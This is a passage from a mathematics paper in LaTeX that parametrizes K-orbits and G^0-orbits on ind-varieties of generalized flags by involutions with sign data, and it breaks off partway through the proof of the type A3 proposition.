$\displaystyle \mathbf{X}^\perp\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}^\perp_w$
and
$\displaystyle \mathbf{X}^\gamma\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}^\gamma_w$
(see Proposition \ref{P2-3.2}).
\begin{proposition}
\label{P4-1.1}
Let $\mathfrak{I}^\epsilon_\infty(\iota)=\mathfrak{I}_\infty(\iota)$ in type A1
and $\mathfrak{I}^\epsilon_\infty(\iota)=\mathfrak{I}'_\infty(\iota)$ in type A2.
\begin{itemize}
\item[\rm (a)] For every $w\in\mathfrak{I}^\epsilon_\infty(\iota)$, \[\bs{\mathcal{O}}_w\cap\bs{\mathfrak{O}}_w=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $w$-dual and $w$-conjugate}\}\not=\emptyset.\]
\item[\rm (b)] For every $w\in\mathfrak{I}^\epsilon_\infty(\iota)$,
\[
\bs{\mathcal{O}}_w=\{\mathcal{F}\in\mathbf{X}:(\mathcal{F}^\perp,\mathcal{F})\in\pmb{\mathbb{O}}^\perp_{w\iota}\} \quad\mbox{and}\quad
\bs{\mathfrak{O}}_w=\{\mathcal{F}\in\mathbf{X}:(\gamma(\mathcal{F}),\mathcal{F})\in\pmb{\mathbb{O}}^\gamma_{w\iota}\}.
\]
\item[\rm (c)] The subsets $\bs{\mathcal{O}}_w$ (for $w\in\mathfrak{I}^\epsilon_\infty(\iota)$) are exactly the $\mathbf{K}$-orbits of $\mathbf{X}$.
The subsets $\bs{\mathfrak{O}}_w$ (for $w\in\mathfrak{I}^\epsilon_\infty(\iota)$) are exactly the $\mathbf{G}^0$-orbits of $\mathbf{X}$.
Moreover $\bs{\mathcal{O}}_w\cap\bs{\mathfrak{O}}_w$ is a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\end{itemize}
\end{proposition}
\subsection{Type A3}
\label{S4.2}
The notation is as in Section \ref{S:A3}.
In particular, we fix a partition $\mathbb{N}^*=N_+\sqcup N_-$ yielding $\Phi$ as in (\ref{phi}) and we consider the corresponding
hermitian form $\phi$ and involution $\delta$ on $\mathbf{V}$.
Let $\mathfrak{I}_\infty(N_+,N_-)$ be the set of pairs $(w,\varepsilon)$ consisting of an involution $w:\mathbb{N}^*\to\mathbb{N}^*$ and a map $\varepsilon:\{\ell:w_\ell=\ell\}\to\{1,-1\}$ such that the subsets
\[N'_\pm=N'_\pm(w,\varepsilon):=\{\ell\in N_\pm:(w_\ell,\varepsilon_\ell)=(\ell,\pm1)\}
\]
satisfy
\[|N_\pm\setminus N'_\pm|=|\{\ell\in N_\mp:(w_\ell,\varepsilon_\ell)=(\ell,\pm 1)\}|+\frac{1}{2}|\{\ell\in\mathbb{N}^*:w_\ell\not=\ell\}|<\infty.\]
In particular, $w\in\mathfrak{S}_\infty$.
Fix $\sigma:\mathbb{N}^*\to (A,\prec)$ a bijection onto a totally ordered set.
We show in Proposition \ref{P4.2-2} that the $\mathbf{K}$-orbits and the $\mathbf{G}^0$-orbits of the ind-variety $\mathbf{X}:=\mathbf{X}(\mathcal{F}_\sigma,E)$ are parametrized by the elements of $\mathfrak{I}_\infty(N_+,N_-)$.
\begin{definition}
Let $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$.
A basis $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$ such that $v_\ell=e_\ell$ for all but finitely many $\ell\in\mathbb{N}^*$ is {\em $(w,\varepsilon)$-conjugate} if
\[\delta(v_k)=\left\{
\begin{array}{ll}
v_{w_k} & \mbox{if $w_k\not=k$,} \\
\varepsilon_kv_k & \mbox{if $w_k=k$}
\end{array}
\right.
\quad\mbox{for all $k\in\mathbb{N}^*$,}\]
and is {\em $(w,\varepsilon)$-dual} if
\[
\phi(v_k,v_\ell)=\left\{
\begin{array}{ll}
0 & \mbox{if $\ell\not=w_k$,} \\
1 & \mbox{if $\ell=w_k\not=k$,} \\
\varepsilon_k & \mbox{if $\ell=w_k=k$}
\end{array}
\right.
\quad\mbox{for all $k,\ell\in\mathbb{N}^*$}.
\]
Set
$\bs{\mathcal{O}}_{(w,\varepsilon)}:=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate}\}$, $\bs{\mathfrak{O}}_{(w,\varepsilon)}:=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual}\}$.
\end{definition}
\paragraph{\bf Notation}
{\rm (a)} Note that every subspace in the generalized flag $\mathcal{F}_\sigma$ is $\delta$-stable, i.e., $\delta(\mathcal{F}_\sigma)=\mathcal{F}_\sigma$.
The map $\mathbf{X}\to\mathbf{X}$, $\mathcal{F}\mapsto\delta(\mathcal{F})$ is well defined.
\\
{\rm (b)} Write $F^\dag=\{x\in\mathbf{V}:\phi(x,y)=0\ \forall y\in F\}$ and
$\mathcal{F}^\dag:=\{F^\dag:F\in \mathcal{F}\}$, which is a generalized flag weakly compatible with $E$ whenever $\mathcal{F}$ is so.
As in Section \ref{S4.1} we write $(A^*,\prec^*)$ for the totally ordered set
such that $A^*=A$ and $a\prec^*a'$ whenever $a\succ a'$.
It is readily seen that $\mathcal{F}_\sigma^\dag=\mathcal{F}_{\sigma^\dag}$
where $\sigma^\dag:\mathbb{N}^*\to(A^*,\prec^*)$ is such that $\sigma^\dag(\ell)=\sigma(\ell)$ for all $\ell\in\mathbb{N}^*$, and we get a well-defined map
\[\mathbf{X}\to\mathbf{X}^\dag:=\mathbf{X}(\mathcal{F}_{\sigma^\dag},E),\ \mathcal{F}\mapsto\mathcal{F}^\dag.\]
{\rm (c)}
We write $\pmb{\mathbb{O}}_w:=(\pmb{\mathbb{O}}_{\sigma,\sigma})_w$ and
$\pmb{\mathbb{O}}_w^\dag:=(\pmb{\mathbb{O}}_{\sigma^\dag,\sigma})_w$ so that
\[\mathbf{X}\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}_w
\quad\mbox{and}\quad
\mathbf{X}^\dag\times\mathbf{X}=\bigsqcup_{w\in\mathfrak{S}_\infty}\pmb{\mathbb{O}}^\dag_w
\]
(see Proposition \ref{P2-3.2}).
\begin{proposition}
\label{P4.2-2}
\begin{itemize}
\item[\rm (a)] For every $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$ we have
\[\bs{\mathcal{O}}_{(w,\varepsilon)}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate and $(w,\varepsilon)$-dual}\}\not=\emptyset.\]
\item[\rm (b)] Let $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$
and $\mathcal{F}=\{F'_a,F''_a:a\in A\}\in\mathbf{X}$. Then
$\mathcal{F}\in\bs{\mathcal{O}}_{(w,\varepsilon)}$ (resp., $\mathcal{F}\in\bs{\mathfrak{O}}_{(w,\varepsilon)}$) if and only if
\[(\delta(\mathcal{F}),\mathcal{F})\in\pmb{\mathbb{O}}_w\quad\mbox{(resp., $(\mathcal{F}^\dag,\mathcal{F})\in\pmb{\mathbb{O}}_w^\dag$)}\]
and
\[
\dim F''_{\sigma(\ell)}\cap \mathbf{V}_\pm/F'_{\sigma(\ell)}\cap \mathbf{V}_\pm
=
\left\{\begin{array}{ll}
1 & \mbox{if $\sigma(w_\ell)\prec\sigma(\ell)$ or $(w_\ell,\varepsilon_\ell)=(\ell,\pm1)$,} \\
0 & \mbox{otherwise}
\end{array}\right.
\]
where $\mathbf{V}_\pm=\langle e_\ell:\ell\in N_\pm\rangle_\mathbb{C}$
(resp., for $n\in\mathbb{N}^*$ large enough
\[
\varsigma(\phi:F''_{\sigma(\ell)}\cap V_n)=\varsigma(\phi:F'_{\sigma(\ell)}\cap V_n)+\left\{
\begin{array}{ll}
(1,1) & \mbox{if $\sigma(w_\ell)\prec\sigma(\ell)$,} \\
(1,0) & \mbox{if $(w_\ell,\varepsilon_\ell)=(\ell,1)$,} \\
(0,1) & \mbox{if $(w_\ell,\varepsilon_\ell)=(\ell,-1)$,} \\
(0,0) & \mbox{if $\sigma(w_\ell)\succ\sigma(\ell)$}
\end{array}
\right.
\]
where we
$V_n=\langle e_k:k\leq n\rangle_\mathbb{C}$
and
$\varsigma(\phi:F)$ stands for the signature of $\phi$ on $F/F\cap F^\dag$)
for all $\ell\in\mathbb{N}^*$.
\item[\rm (c)] The subsets $\bs{\mathcal{O}}_{(w,\varepsilon)}$ ($(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$) are exactly the $\mathbf{K}$-orbits of $\mathbf{X}$. The subsets $\bs{\mathfrak{O}}_{(w,\varepsilon)}$ ($(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$) are exactly the $\mathbf{G}^0$-orbits of $\mathbf{X}$.
Moreover $\bs{\mathcal{O}}_{(w,\varepsilon)}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}$ is a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\end{itemize}
\end{proposition}
\subsection{Types B, C, D}
\label{S4.3}
Assume that $\mathbf{V}$ is endowed with a nondegenerate symmetric or symplectic form $\omega$, determined by a matrix $\Omega$ as in (\ref{omega}).
Let $\iota:\mathbb{N}^*\to\mathbb{N}^*$, $\ell\mapsto\ell^*$
satisfy $\omega(e_\ell,e_{\ell^*})\not=0$ for all $\ell$.
Let $\mathbb{N}^*=N_+\sqcup N_-$ be a partition such that $N_+,N_-$ are either both $\iota$-stable or such that $\iota(N_+)=N_-$.
As before, let $\phi$ and $\delta$ be the hermitian form and the involution of $\mathbf{V}$
corresponding to this partition.
The following table summarizes the different cases.
\begin{center}
\begin{tabular}{|c|c|c|}
\cline{2-3}
\multicolumn{1}{c|}{ } & \begin{tabular}{c} $\omega$ symmetric \\ $\epsilon=1$ \end{tabular} & \begin{tabular}{c} $\omega$ symplectic \\ $\epsilon=-1$ \end{tabular} \\
\hline
\begin{tabular}{c} $\iota(N_\pm)\subset N_\pm$ \\ $\eta=1$ \end{tabular} & type BD1 & type C2 \\
\hline
\begin{tabular}{c} $\iota(N_\pm)=N_\mp$ \\ $\eta=-1$ \end{tabular} & type D3 & type C1 \\
\hline
\end{tabular}
\end{center}
Let $\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)\subset
\mathfrak{I}_\infty(N_+,N_-)$ be the subset of pairs
$(w,\varepsilon)$ such that
\begin{itemize}
\item[\rm (i)] $\iota w=w\iota$ (hence the set $\{\ell:w_\ell=\ell\}$ is $\iota$-stable);
\item[\rm (ii)] $\varepsilon_{\iota(k)}=\eta\varepsilon_k$ for all $k\in\{\ell:w_\ell=\ell\}$;
\item[\rm (iii)] and if $\eta\epsilon=-1$: $w_k\not=\iota(k)$ for all $k\in\mathbb{N}^*$.
\end{itemize}
Let $\mathcal{F}_\sigma$ be an $\omega$-isotropic maximal generalized flag compatible with $E$.
Thus $\sigma:\mathbb{N}^*\to(A,\prec)$ is a bijection
onto a totally ordered set $(A,\prec)$ endowed with an (involutive) antiautomorphism of ordered sets
$\iota_A:(A,\prec)\to (A,\prec)$ such that $\sigma\iota=\iota_A\sigma$.
The following statement shows that the $\mathbf{K}$-orbits and the $\mathbf{G}^0$-orbits
of the ind-variety $\mathbf{X}_\omega:=\mathbf{X}_\omega(\mathcal{F}_\sigma,E)$
are parametrized by the elements of the set $\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$.
\begin{proposition}
\label{P4.3}
We consider bases $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$ such that
\begin{equation}
\label{4-3.1}
\omega(v_k,v_\ell)\not=0\quad\mbox{if and only if}\quad \ell=\iota(k).
\end{equation}
\begin{itemize}
\item[\rm (a)] For every $(w,\varepsilon)\in\mathfrak{I}^{\eta,\epsilon}_\infty(N_+,N_-)$ we have
\begin{eqnarray*}
& \bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}:=\bs{\mathcal{O}}_{(w,\varepsilon)}\cap\mathbf{X}_\omega=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate and satisfies (\ref{4-3.1})}\}\not=\emptyset, \\
& \bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}:=\bs{\mathfrak{O}}_{(w,\varepsilon)}\cap\mathbf{X}_\omega=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-dual and satisfies (\ref{4-3.1})}\}\not=\emptyset, \\
& \bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}=\{\mathcal{F}_\sigma(\underline{v}):\mbox{$\underline{v}$ is $(w,\varepsilon)$-conjugate, $(w,\varepsilon)$-dual and satisfies (\ref{4-3.1})}\}\not=\emptyset.
\end{eqnarray*}
\item[\rm (b)] The subsets $\bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$
($(w,\varepsilon)\in\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$)
are exactly the $\mathbf{K}$-orbits of $\mathbf{X}_\omega$.
The subsets $\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$
($(w,\varepsilon)\in\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$)
are exactly the $\mathbf{G}^0$-orbits of $\mathbf{X}_\omega$.
Moreover $\bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$ is a single $\mathbf{K}\cap\mathbf{G}^0$-orbit.
\end{itemize}
\end{proposition}
\subsection{Ind-variety structure}
\label{S4.4}
In this section we recall from \cite{Dimitrov-Penkov} the ind-variety structure on $\mathbf{X}$ and $\mathbf{X}_\omega$.
Recall that $E=(e_1,e_2,\ldots)$ is a (countable) basis of $\mathbf{V}$.
Fix an $E$-compatible maximal generalized flag $\mathcal{F}_\sigma$ corresponding
to a bijection $\sigma:\mathbb{N}^*\to(A,\prec)$ onto a totally ordered set, and let
$\mathbf{X}=\mathbf{X}(\mathcal{F}_\sigma,E)$.
Let $V_n:=\langle e_1,\ldots,e_n\rangle_\mathbb{C}$ and
let $X_n$ denote the variety of complete flags of $V_n$ defined as in (\ref{2.2.X}).
There are natural inclusions
$V_n\subset V_{n+1}$
and
\begin{equation}
\label{4.4-1}
\mathrm{GL}(V_n)\cong\{g\in \mathrm{GL}(V_{n+1}):g(V_n)=V_n,\ g(e_{n+1})=e_{n+1}\}\subset \mathrm{GL}(V_{n+1}),
\end{equation}
and we obtain a $\mathrm{GL}(V_n)$-equivariant embedding
\[\iota_n=\iota_n(\sigma):X_n\to X_{n+1},\ (F_k)_{k=0}^n\mapsto (F'_k)_{k=0}^{n+1}\]
by letting
\[F'_k:=\left\{
\begin{array}{ll}
F_k & \mbox{if $a_k\prec\sigma(n+1)$} \\
F_{k-1}\oplus\langle e_{n+1}\rangle_\mathbb{C} & \mbox{if $a_k\succeq \sigma(n+1)$}
\end{array}
\right.\]
where $a_1\prec a_2\prec\ldots\prec a_{n+1}$ are the elements of the set $\{\sigma(\ell):1\leq \ell\leq n+1\}$ written in increasing order.
Therefore, we get a chain of embeddings (which are morphisms of algebraic varieties)
\[\cdots \hookrightarrow X_{n-1} \stackrel{\iota_{n-1}}{\hookrightarrow} X_n \stackrel{\iota_{n}}{\hookrightarrow} X_{n+1} \stackrel{\iota_{n+1}}{\hookrightarrow} \cdots\]
and $\mathbf{X}$ is obtained as the direct limit
\[\mathbf{X}=\mathbf{X}(\mathcal{F}_\sigma,E)=\lim_\to X_n.\]
In particular for each $n$ we get an embedding $\hat{\iota}_n:X_n\hookrightarrow \mathbf{X}$
and up to identifying $X_n$ with its image by this embedding we can view $\mathbf{X}$ as the union
$\mathbf{X}=\bigcup_{n\geq 1}X_n$.
Every generalized flag $\mathcal{F}\in\mathbf{X}$ belongs to all $X_n$ after some rank $n_\mathcal{F}$. For instance $\mathcal{F}_\sigma\in X_n$ for all $n\geq 1$.
A basis $\underline{v}=(v_1,\ldots,v_n)$ of $V_n$ can be completed into the basis of $\mathbf{V}$ denoted by $\underline{\hat{v}}:=(v_1,\ldots,v_n,e_{n+1},e_{n+2},\ldots)$, and we have
\begin{equation}
\label{completed-basis}
\hat{\iota}_n(\mathcal{F}(v_{\tau_1},\ldots,v_{\tau_n}))=\mathcal{F}_\sigma(\underline{\hat{v}})
\end{equation}
(using the notation of Sections \ref{S2.2}--\ref{S2.3})
where $\tau=\tau^{(n)}\in\mathfrak{S}_n$ is the permutation such that
$\sigma(\tau^{(n)}_1)\prec\ldots\prec\sigma(\tau^{(n)}_n)$.
Recall that the ind-topology on $\mathbf{X}$ is defined by declaring a subset $\mathbf{Z}\subset\mathbf{X}$ open (resp., closed) if every intersection $\mathbf{Z}\cap X_n$ is open (resp., closed).
Clearly the ind-variety structure on $\mathbf{X}$ is not modified if the sequence $(X_n,\iota_n)_{n\geq 1}$ is replaced by a subsequence $(X_{n_k},\iota'_k)_{k\geq 1}$
where $\iota'_k:=\iota_{n_{k+1}-1}\circ\cdots\circ\iota_{n_k}$.
In type A3 (using the notation of Section \ref{S2.1}) the subspace $V_n\subset\mathbf{V}$ is endowed with the restrictions of $\phi$ and $\delta$
hence we can define $K_n,G_n^0\subset \mathrm{GL}(V_n)$ (as in Section \ref{S3.2})
and the inclusion of (\ref{4.4-1}) restricts to natural inclusions
$K_n\subset K_{n+1}$ and $G_n^0\subset G_{n+1}^0$.
Next assume that the space $\mathbf{V}$ is endowed with a nondegenerate symmetric or symplectic form $\omega$ determined by the matrix $\Omega$ of (\ref{omega}).
The blocks $J_1,J_2,\ldots$ in the matrix $\Omega$ are of size $1$ or $2$.
We set $n_k:=|J_1|+\ldots+|J_k|$
so that the restriction of $\omega$ to each subspace $V_{n_k}$ is nondegenerate.
Hence in types A1, A2, BD1, C1, C2, and D3 we can define
the subgroups $K_{n_k},G_{n_k}^0\subset \mathrm{GL}(V_{n_k})$
(as in Section \ref{S3})
and (\ref{4.4-1}) yields natural inclusions
\[K_{n_k}\subset K_{n_{k+1}}\quad\mbox{and}\quad G^0_{n_k}\subset G^0_{n_{k+1}}.\]
Moreover, the subvariety $(X_{n_k})_\omega\subset X_{n_k}$ of isotropic flags (with respect to $\omega$) can be defined as in (\ref{2.2.Xomega}).
Assuming that the generalized flag $\mathcal{F}_\sigma$ is $\omega$-isotropic, the embedding
$\iota'_k:X_{n_k}\hookrightarrow X_{n_{k+1}}$ maps $(X_{n_k})_\omega$ into $(X_{n_{k+1}})_\omega$ and we have
\[\mathbf{X}_\omega=\mathbf{X}_\omega(\mathcal{F}_\sigma,E)=\bigcup_{k\geq 1}(X_{n_k})_\omega\quad\mbox{and}\quad (X_{n_k})_\omega=\mathbf{X}_\omega\cap X_{n_k}\ \mbox{for all $k\geq 1$}.\]
In particular, $\mathbf{X}_\omega$ is a closed ind-subvariety of $\mathbf{X}$
(as stated in Proposition \ref{P2.3-3}).
\subsection{Proofs}
\label{S4.proofs}
\begin{proof}[Proof of Proposition \ref{P4-1.1}]
Let $\mathcal{F}=\{F'_a,F''_a:a\in A\}=\mathcal{F}_\sigma(\underline{v})$ for a basis $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$.
Let $w\in\mathfrak{I}_\infty^\epsilon(\iota)$.
If the basis $\underline{v}$ is $w$-dual, then
\[
(F'_a)^\perp=\langle v_\ell:\sigma(w_\ell)\succeq a\rangle_\mathbb{C}
\quad\mbox{and}\quad
(F''_a)^\perp=\langle v_\ell:\sigma(w_\ell)\succ a\rangle_\mathbb{C}\,,
\]
hence $\mathcal{F}^\perp=\mathcal{F}_{\sigma^\perp\iota w}(\underline{v})$;
this yields
$(\mathcal{F}^\perp,\mathcal{F})\in\pmb{\mathbb{O}}^\perp_{w\iota}$.
If $\underline{v}$ is $w$-conjugate, then
\[
\gamma(F'_a)=\langle v_\ell:\sigma(w_\ell)\prec a\rangle_\mathbb{C}
\quad\mbox{and}\quad
\gamma(F''_a)=\langle v_\ell:\sigma(w_\ell)\preceq a\rangle_\mathbb{C}\,,
\]
whence $\gamma(\mathcal{F})=\mathcal{F}_{\sigma w}(\underline{v})$
and
$(\gamma(\mathcal{F}),\mathcal{F})\in\pmb{\mathbb{O}}^\gamma_{w\iota}$.
This proves the inclusions $\subset$ in Proposition \ref{P4-1.1}\,{\rm (b)}.
Note that these inclusions imply in particular that the subsets $\bs{\mathcal{O}}_w$, as well as $\bs{\mathfrak{O}}_w$, are pairwise disjoint.
For $w\in\mathfrak{I}_{n_k}^\epsilon$ we define $\hat{w}:\mathbb{N}^*\to\mathbb{N}^*$ by letting
\[\hat{w}(\ell)=\left\{
\begin{array}{ll}
\tau w\tau^{-1}(\ell) & \mbox{if $\ell\leq n_k$,} \\
\iota(\ell) & \mbox{if $\ell\geq n_k+1$}
\end{array}
\right.\]
where $\tau=\tau^{(n_k)}:\{1,\ldots,n_k\}\to\{1,\ldots,n_k\}$ is the
permutation such that $\sigma(\tau_1)\prec\ldots\prec\sigma(\tau_{n_k})$.
It is easy to see that we obtain a well-defined (injective) map
$j_k:\mathfrak{I}_{n_k}^\epsilon\to\mathfrak{I}_\infty^\epsilon(\iota)$, $j_k(w):=\hat{w}$,
and
\begin{equation}
\label{4.5.0}
\mathfrak{I}_\infty^\epsilon(\iota)=\bigcup_{k\geq 1}j_k(\mathfrak{I}_{n_k}^\epsilon).\end{equation}
Moreover,
given a basis $\underline{v}=(v_1,\ldots,v_{n_k})$ of $V_{n_k}$ and
the basis $\underline{\hat{v}}$ of $\mathbf{V}$ obtained by adding the vectors $e_\ell$ for $\ell\geq n_k+1$,
the implication
\begin{eqnarray}
\label{4.5.1}
& \mbox{$(v_{\tau_1},\ldots,v_{\tau_{n_k}})$ is $w$-dual (resp., $w$-conjugate)} \\
\nonumber
& \Rightarrow \
\mbox{$\underline{\hat{v}}$ is $\hat{w}$-dual (resp., $\hat{w}$-conjugate)}
\end{eqnarray}
clearly follows from our constructions.
Note that
\begin{equation}
\label{T-proof.1}
\bs{\mathcal{O}}_{\hat{w}}\cap X_{n_k}=\mathcal{O}_{w}
\quad
\mbox{and}
\quad
\bs{\mathfrak{O}}_{\hat{w}}\cap X_{n_k}=\mathfrak{O}_{w}
\end{equation}
where $\mathcal{O}_w,\mathfrak{O}_w\subset X_{n_k}$ are the orbits defined in Definition \ref{DA12};
indeed, the inclusions $\supset$ in (\ref{T-proof.1}) are implied by
(\ref{completed-basis}) and (\ref{4.5.1}),
whereas the inclusions $\subset$ follow from
Proposition \ref{P1}\,{\rm (c)}
and the fact that the subsets $\bs{\mathcal{O}}_{\hat{w}}$, as well as $\bs{\mathfrak{O}}_{\hat{w}}$,
are pairwise disjoint.
Parts {\rm (a)} and {\rm (c)} of Proposition \ref{P4-1.1} now follow
from (\ref{4.5.0})--(\ref{T-proof.1}) and Proposition \ref{P1}\,{\rm (a)}, {\rm (c)}. By Proposition \ref{P4-1.1}\,{\rm (a)} we deduce that equalities hold in Proposition \ref{P4-1.1}\,{\rm (b)}, and the proof is complete.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P4.2-2}]
For every $n\geq 1$ we set $p_n=|N_+\cap\{1,\ldots,n\}|$ and $q_n=|N_-\cap\{1,\ldots,n\}|$.
Let $\mathcal{F}=\{F'_a,F''_a:a\in A\}=\mathcal{F}_\sigma(\underline{v})$ for some basis $\underline{v}=(v_1,v_2,\ldots)$ of $\mathbf{V}$.
Let $(w,\varepsilon)\in\mathfrak{I}_\infty(N_+,N_-)$.
If $\underline{v}$ is $(w,\varepsilon)$-conjugate, then
\[
\delta(F'_a)=\langle v_\ell:\sigma(w_\ell)\prec a\rangle_\mathbb{C}
\quad\mbox{and}\quad
\delta(F''_a)=\langle v_\ell:\sigma(w_\ell)\preceq a\rangle_\mathbb{C}
\]
so that $(\delta(\mathcal{F}),\mathcal{F})=(\mathcal{F}_{\sigma w}(\underline{v}),\mathcal{F}_\sigma(\underline{v}))\in\pmb{\mathbb{O}}_w$.
In addition,
\[\left\{
\begin{array}{ll}
\mbox{$F''_{\sigma(\ell)}\cap\mathbf{V}_+/F'_{\sigma(\ell)}\cap\mathbf{V}_+=\langle v_\ell\rangle_\mathbb{C}$, $F''_{\sigma(\ell)}\cap\mathbf{V}_-=F'_{\sigma(\ell)}\cap\mathbf{V}_-$} & \mbox{\!\!\!if $(w_\ell,\varepsilon_\ell)=(\ell,+1)$,} \\[1.5mm]
\mbox{$F''_{\sigma(\ell)}\cap\mathbf{V}_-/F'_{\sigma(\ell)}\cap\mathbf{V}_-=\langle v_\ell\rangle_\mathbb{C}$, $F''_{\sigma(\ell)}\cap\mathbf{V}_+=F'_{\sigma(\ell)}\cap\mathbf{V}_+$} & \mbox{\!\!\!if $(w_\ell,\varepsilon_\ell)=(\ell,-1)$,} \\[1.5mm]
\mbox{$F''_{\sigma(\ell)}\cap\mathbf{V}_+/F'_{\sigma(\ell)}\cap\mathbf{V}_+=\langle v_\ell+v_{w_\ell}\rangle_\mathbb{C}$\,,} \\[1mm]
\mbox{\qquad $F''_{\sigma(\ell)}\cap\mathbf{V}_-/F'_{\sigma(\ell)}\cap\mathbf{V}_-=\langle v_\ell- v_{w_\ell}\rangle_\mathbb{C}$} & \mbox{\!\!\!if $\sigma(w_\ell)\prec\sigma(\ell)$,} \\[1.5mm]
F''_{\sigma(\ell)}\cap \mathbf{V}_+=F'_{\sigma(\ell)}\cap \mathbf{V}_+,\ F''_{\sigma(\ell)}\cap \mathbf{V}_+=F'_{\sigma(\ell)}\cap \mathbf{V}_+ & \mbox{\!\!\!if $\sigma(w_\ell)\succ\sigma(\ell)$,}
\end{array}
\right.\]
which proves the formula for $\dim F''_{\sigma(\ell)}\cap \mathbf{V}_\pm/F'_{\sigma(\ell)}\cap \mathbf{V}_\pm$ stated in Proposition \ref{P4.2-2}\,{\rm (b)}.
If $\underline{v}$ is $(w,\varepsilon)$-dual, then we get similarly
\[
(F'_a)^\dag=\langle v_\ell:\sigma(w_\ell)\succeq a\rangle_\mathbb{C}
\quad\mbox{and}\quad
(F''_a)^\dag=\langle v_\ell:\sigma(w_\ell)\succ a\rangle_\mathbb{C}\,.
\]
Hence $(\mathcal{F}^\dag,\mathcal{F})=(\mathcal{F}_{\sigma^\dag w}(\underline{v}),\mathcal{F}_\sigma(\underline{v}))\in\pmb{\mathbb{O}}_w^\dag$.
For $n\geq 1$ large enough we have
$(w_\ell,\varepsilon_\ell)=(\ell,\pm1)$ for all $\ell\in N_\pm\cap\{n+1,n+2,\ldots\}$
and $v_\ell=e_\ell$ for all $\ell\geq n+1$.
Thus the pair $(\check{w},\check{\varepsilon}):=(w|_{\{1,\ldots,n\}},\varepsilon|_{\{1,\ldots,n\}})$ belongs to $\mathfrak{I}_n(p_n,q_n)$
whereas by (\ref{completed-basis}) we have
\[\mathcal{F}=\mathcal{F}(v_{\tau_1},\ldots,v_{\tau_n}).\]
The basis $(v_{\tau_1},\ldots,v_{\tau_n})$ of $V_n$ is $(\tau^{-1}\check{w}\tau,\check{\varepsilon}\tau)$-dual if $\underline{v}$ is $(w,\varepsilon)$-dual; the last formula in Proposition \ref{P4.2-2}\,{\rm (b)} now follows from Proposition \ref{P2}\,{\rm (b)} and this observation. Altogether this shows the ``only if'' part in
Proposition \ref{P4.2-2}\,{\rm (b)}, which guarantees in particular that the subsets $\bs{\mathcal{O}}_{(w,\varepsilon)}$, as well as the subsets $\bs{\mathfrak{O}}_{(w,\varepsilon)}$,
are pairwise disjoint.
The ``if'' part of Proposition \ref{P4.2-2}\,{\rm (b)} follows once we show
Proposition \ref{P4.2-2}\,{\rm (a)}.
For $(w,\varepsilon)\in\mathfrak{I}_n(p_n,q_n)$
we set
\begin{equation}
\label{4.5.4}
\hat{w}(\ell)=\left\{
\begin{array}{ll}
\tau w\tau^{-1}(\ell) & \mbox{if $\ell\leq n$,} \\
\ell & \mbox{if $\ell\geq n+1$}
\end{array}
\right.\quad\mbox{for all $\ell\in\mathbb{N}^*$,}
\end{equation}
where $\tau=\tau^{(n)}\in\mathfrak{S}_n$ is as in (\ref{completed-basis}), and
\begin{equation}
\label{4.5.5}\hat{\varepsilon}(\ell)=\left\{
\begin{array}{ll}
\varepsilon\tau^{-1}(\ell) & \mbox{if $\ell\leq n$,} \\
1 & \mbox{if $\ell\geq n+1$, $n\in N_+$,} \\
-1 & \mbox{if $\ell\geq n+1$, $n\in N_-$}
\end{array}
\right.
\end{equation}
for all $\ell\in\mathbb{N}^*$ such that $\hat{w}_\ell=\ell$.
We have readily seen that $(\hat{w},\hat{\varepsilon})\in\mathfrak{I}_\infty(N_+,N_-)$,
and in fact the so obtained map $j_n:\mathfrak{I}_n(p_n,q_n)\to\mathfrak{I}_\infty(N_+,N_-)$ is well defined, injective,
and
\[
\mathfrak{I}_\infty(N_+,N_-)=\bigcup_{n\geq 1}j_n(\mathfrak{I}_n(p_n,q_n)).
\]
Moreover, it follows from our constructions that, given a basis $\underline{v}=(v_1,\ldots,v_n)$ of $V_n$ and the basis $\underline{\hat{v}}$ of $\mathbf{V}$ obtained by adding the vectors $e_\ell$ for $\ell\geq n+1$, we have:
\begin{eqnarray*}
& \mbox{$(v_{\tau_1},\ldots,v_{\tau_n})$ is $(w,\varepsilon)$-conjugate (resp., dual)} \\
& \Rightarrow \
